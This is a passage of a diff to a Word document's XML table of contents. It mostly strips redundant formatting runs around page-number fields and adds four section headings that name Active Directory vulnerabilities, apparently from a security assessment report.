               <w:instrText xml:space="preserve"> PAGEREF _Toc224561312 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2387,40 +2149,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561313 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>13</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2448,43 +2180,69 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561314 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>13</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>5.7  GPP Passwords — MS14-025</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>5.8  Bronze Bit — CVE-2020-17049</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>5.9  Certifried — CVE-2022-26923</w:t>
+          </w:r>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC2"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
+            </w:tabs>
+          </w:pPr>
+          <w:r>
+            <w:rPr>
+              <w:noProof/>
+            </w:rPr>
+            <w:t>5.10  LDAP Signing Not Required</w:t>
+          </w:r>
         </w:p>
         <w:p>
           <w:pPr>
@@ -2509,40 +2267,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561315 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2570,40 +2298,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561316 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2631,40 +2329,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561317 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2692,40 +2360,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561318 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2753,40 +2391,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561319 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2814,40 +2422,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561320 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2875,40 +2453,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561321 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2936,40 +2484,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561322 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>15</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -2997,40 +2515,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561323 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>17</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3058,40 +2546,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561324 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>17</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3119,40 +2577,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561325 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>17</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3180,40 +2608,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561326 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>17</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3241,40 +2639,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561327 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>18</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3302,40 +2670,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561328 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>18</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3363,40 +2701,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561329 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3424,40 +2732,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561330 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3485,40 +2763,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561331 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3546,40 +2794,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561332 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>19</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3607,40 +2825,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561333 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3668,40 +2856,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561334 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3729,40 +2887,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561335 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3790,40 +2918,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561336 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3851,40 +2949,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561337 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3912,40 +2980,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561338 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>21</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -3973,40 +3011,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561339 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>22</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4034,40 +3042,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561340 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>23</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4095,40 +3073,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561341 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>23</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
@@ -4156,40 +3104,10 @@
                 <w:noProof/>
               </w:rPr>
               <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:instrText xml:space="preserve"> PAGEREF _Toc224561342 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-              </w:rPr>
               <w:t>23</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
